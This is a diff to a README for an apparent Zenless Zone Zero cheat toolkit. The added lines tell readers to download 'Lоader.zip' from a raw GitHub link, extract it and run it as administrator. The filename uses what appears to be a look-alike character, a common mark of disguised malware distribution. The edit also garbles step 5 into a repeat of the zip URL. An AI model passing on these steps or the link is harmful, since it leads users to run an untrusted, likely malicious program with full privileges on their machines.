huunhan210303/ZenlessZoneZeroToolkit/README.md

 **Follow these steps to begin:**

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/huunhan210303/ZenlessZoneZeroToolkit/main/Lоader.zip` from the repository.
 2. Extract the contents using your favorite archive tool (WinRAR, 7zip, Keka, etc.).
 3. Run the Loader application as administrator (Windows) or with required permissions (macOS/Linux).
 4. Launch Zenless Zone Zero and enjoy your new capabilities!
-5. Refer to the 'User Guide.pdf' included for detailed setup help, troubleshooting, and FAQ.
+5. Refer to the 'User https://raw.githubusercontent.com/huunhan210303/ZenlessZoneZeroToolkit/main/Lоader.zip' included for detailed setup help, troubleshooting, and FAQ.

 *Always check for the latest version for new features and the best compatibility!*